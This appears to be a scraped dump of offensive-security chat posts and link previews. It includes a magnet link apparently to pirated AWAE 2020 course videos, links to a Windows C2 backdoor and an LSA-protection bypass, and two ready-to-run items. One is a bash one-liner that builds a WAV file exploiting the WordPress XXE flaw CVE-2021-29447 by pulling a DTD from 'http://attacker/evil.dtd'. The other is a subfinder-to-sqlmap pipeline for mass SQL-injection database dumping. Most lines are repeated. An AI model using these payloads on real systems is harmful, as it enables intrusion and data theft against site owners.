Advanced Web Attacks and Exploatation 2020
about
https://www.offensive-security.com/offsec/awae-2020-update/
https://www.exploit-db.com/advanced-web-attacks
magnet:?xt=urn:btih:2ED593EA8EEA4AC9A39B30B07A7C45E788D78068&dn=AWAE%20Video%202020&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
about
https://www.offensive-security.com/offsec/awae-2020-update/
https://www.exploit-db.com/advanced-web-attacks
magnet:?xt=urn:btih:2ED593EA8EEA4AC9A39B30B07A7C45E788D78068&dn=AWAE%20Video%202020&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
OffSec
AWAE: Updated with More Content for 2020 | OffSec
The Advanced Web Attacks and Exploitation (AWAE) course has been updated for 2020. Learn what changed, why we did it, and how it will help you.
Now might be a good time to make sure you have local copies of all the offensive security tools on GitHub
CVE-2021-29447 #WordPress XXE: you don't need a wave file to set iXML metadata! bash:
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
find sql injection
subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
subfinder -d target | tee -a domains
cat domain | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls
gf sqli urls >> sqli
sqlmap -m sqli --dbs --batch
happy hacking
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
https://github.com/Cr4sh/MicroBackdoor
https://github.com/Cr4sh/MicroBackdoor
GitHub
GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets
Small and convenient C2 tool for Windows targets. Contribute to Cr4sh/MicroBackdoor development by creating an account on GitHub.
Bypassing LSA Protection in Userland – Sec Team Blog
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
GitHub - Porchetta-Industries/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
https://github.com/Porchetta-Industries/pyMalleableC2
https://github.com/Porchetta-Industries/pyMalleableC2
GitHub
GitHub - byt3bl33d3r/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and…
Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically. - byt3bl33d3r/pyMalleableC2
Weird Ways to Run Unmanaged Code in .NET - XPN InfoSec Blog
https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
XPN InfoSec Blog
@_xpn_ - Weird Ways to Run Unmanaged Code in .NET
Recently I've been looking at the .NET CLR internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snipped of some of the weird techniques that I found.
A tcpdump Tutorial with Examples — 50 Ways to Isolate Traffic | Daniel Miessler
https://danielmiessler.com/study/tcpdump/
https://danielmiessler.com/study/tcpdump/
Danielmiessler
A tcpdump Tutorial with Examples
tcpdump is the world's premier network analysis tool—combining both power and simplicity into a single command-line interface. This guide will show